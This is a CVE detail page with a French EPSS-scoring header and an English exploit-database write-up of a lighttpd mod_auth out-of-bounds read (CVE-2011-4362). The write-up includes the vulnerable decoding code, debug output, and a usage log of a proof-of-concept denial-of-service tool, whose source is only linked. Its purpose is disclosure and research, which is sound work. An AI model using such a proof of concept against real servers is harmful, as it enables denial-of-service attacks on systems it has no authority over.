CVE-2011-4362 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

29 of November 2011 was the date of public disclosure interesting vulnerability in lighttpd server. Xi Wang discovered that mod_auth for this server does not propely decode characters from the extended ASCII table. The vulnerable code is below: "src/http_auth.c:67" --- CUT --- static const short base64_reverse_table[256] = ...; static unsigned char * base64_decode(buffer *out, const char *in) { ... int ch, ...; size_t i; ... ch = in[i]; ... ch = base64_reverse_table[ch]; ... } --- CUT --- Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table table cause this situation. I have added some extra debug in the lighttpd source code to see if this vulnerability is executed correctly. Here is output for one of the example: --- CUT --- ptr[0x9a92c48] size[0xc0] used[0x0] 127(. | 0 | 0) -128(t | 1 | 0) -127(e | 2 | 1) -126(' | 3 | 2) -125(e | 4 | 3) -124(u | 5 | 3) -123(r | 6 | 4) -122(' | 7 | 5) -121(s | 8 | 6) -120(c | 9 | 6) -119(i | 10 | 7) -118(n | 11 | 8) -117(i | 12 | 9) -116( | 13 | 9) -115(a | 14 | 10) -114(t | 15 | 11) -113(. | 16 | 12) -112(e | 17 | 12) -111(u | 18 | 13) -110(r | 19 | 14) -109(' | 20 | 15) -108(f | 21 | 15) -107(i | 22 | 16) -106(e | 23 | 17) -105(: | 24 | 18) -104(= | 25 | 18) -103(o | 26 | 19) -102(t | 27 | 20) -101(o | 28 | 21) -100( | 29 | 21) -99(a | 30 | 22) -98(g | 31 | 23) -97(. | 32 | 24) -96(d | 33 | 24) -95(g | 34 | 25) -94(s | 35 | 26) -93(: | 36 | 27) -92(u | 37 | 27) -91(s | 38 | 28) -90(p | 39 | 29) -89(o | 40 | 30) -88(t | 41 | 30) -87(d | 42 | 31) -86(b | 43 | 32) -85(c | 44 | 33) -84(e | 45 | 33) -83(d | 46 | 34) -82(( | 47 | 35) -81(n | 48 | 36) -80(y | 49 | 36) -79(h | 50 | 37) -78(d | 51 | 38) -77(g | 52 | 39) -76(s | 53 | 39) -75( | 54 | 40) -74(r | 55 | 41) -73(p | 56 | 42) -72(a | 57 | 42) -71(n | 58 | 43) -70(. | 59 | 44) -69(. | 60 | 45) -68(d | 61 | 45) -67(g | 62 | 46) -66(s | 63 | 47) -65(: | 64 | 48) -64(( | 65 | 48) -63(d | 66 | 49) -62(- | 67 | 50) -61(e | 68 | 51) -60(s | 69 | 51) -59( | 70 | 52) -58(i | 71 | 53) -57(s | 72 | 54) -56(n | 73 | 54) -55( | 74 | 55) -54(i | 75 | 56) -53(l | 76 | 57) -52(. | 77 | 57) -51(. | 78 | 58) -50(k | 79 | 59) -49(0 | 80 | 60) -48(% | 81 | 60) -47(] | 82 | 61) -46(p | 83 | 62) -45(r | 84 | 63) -44(0 | 85 | 63) -43(% | 86 | 64) -42(] | 87 | 65) -41(s | 88 | 66) -40(z | 89 | 66) -39([ | 90 | 67) -38(x | 91 | 68) -37(x | 92 | 69) -36( | 93 | 69) -35(s | 94 | 70) -34(d | 95 | 71) -33(0 | 96 | 72) -32(% | 97 | 72) -31(] | 98 | 73) -30(. | 99 | 74) -29(. | 100 | 75) -28(d | 101 | 75) -27(c | 102 | 76) -26(d | 103 | 77) -25(i | 104 | 78) -24(g | 105 | 78) -23(b | 106 | 79) -22(s | 107 | 80) -21(6 | 108 | 81) -20(- | 109 | 81) -19(t | 110 | 82) -18(i | 111 | 83) -17(g | 112 | 84) -16(f | 113 | 84) -15(i | 114 | 85) -14(e | 115 | 86) -13(. | 116 | 87) -12(. | 117 | 87) -11(. | 118 | 88) -10(. | 119 | 89) -9(. | 120 | 90) -8(. | 121 | 90) -7(. | 122 | 91) -6(. | 123 | 92) -5(. | 124 | 93) -4(. | 125 | 93) -3(. | 126 | 94) -2(. | 127 | 95) -1(. | 128 | 96) k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] ptr[0x9a92c48] size[0xc0] used[0x60] string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] --- CUT --- First column is the offset so vulnerability is executed like it should be (negative offsets). Second column is byte which is read out-of-bound. How to run this very primitive Proof of Concept? $ gcc p_cve-2011-4362.c -o p_cve-2011-4362 $ ./p_cve-2011-4362 ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::... Usage: ./p_cve-2011-4362 <options> Options: -v <victim> -p <port> -d <remote_dir_for_auth> $ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::... [+] Preparing arguments... OK [+] Creating socket... OK [+] Connecting to [127.0.0.1]... OK [+] Sending dirty packet... OK [+] Check the website! $ Lighttpd will log this situation probably in error-log file like this: --- CUT --- .. .. 2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in �Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp� ]߶��\���@V��x���ize --- CUT --- Maybe you can find vulnerable binary? Best regards, Adam 'pi3' Zabrocki -- http://pi3.com.pl https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18295.c (p_cve-2011-4362.c) http://blog.pi3.com.pl/?p=277